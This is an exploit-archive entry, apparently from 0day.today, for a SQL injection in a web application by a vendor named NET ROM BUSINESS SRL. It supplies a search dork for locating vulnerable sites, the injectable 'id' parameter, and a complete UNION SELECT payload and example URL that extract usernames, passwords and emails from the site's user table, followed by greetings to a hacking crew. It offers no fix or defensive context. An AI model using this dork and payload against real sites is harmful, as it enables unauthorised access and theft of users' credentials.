id: 13658
date: 08/11/2010
title: NET ROM BUSINESS SRL SQL Injection Vulnerability
author: Pokeng
cves: 

================================================
NET ROM BUSINESS SRL SQL Injection Vulnerability
================================================

# Author: Pokeng

# Platform / Tested on: Win/Linux

# category: webapps/0day

# Dork : inurl:detalii_categorii.php


# Bugs : http://[site]detalii_categorii.php?id=[SQLI]


# Exploit : 1+and+1=0+union+select+all+1,2,3,concat_ws(0x3a,username,parola,email_user),5,6,7,8,9,10+from+useri--

# Example : http://[site]detalii_categorii.php?id=1+and+1=0+union+select+all+1,2,3,concat_ws(0x3a,username,parola,email_user),5,6,7,8,9,10+from+useri--



[*] Greetz
  
Explore Crew : ArRay Akatsuchi `yuda N4ck0 K4pt3N samu1241 bejamz Gameover antitos yuki eCh0 aphe_aphe

http://explorecrew.org/



#  0day.today [2023-03-22]  #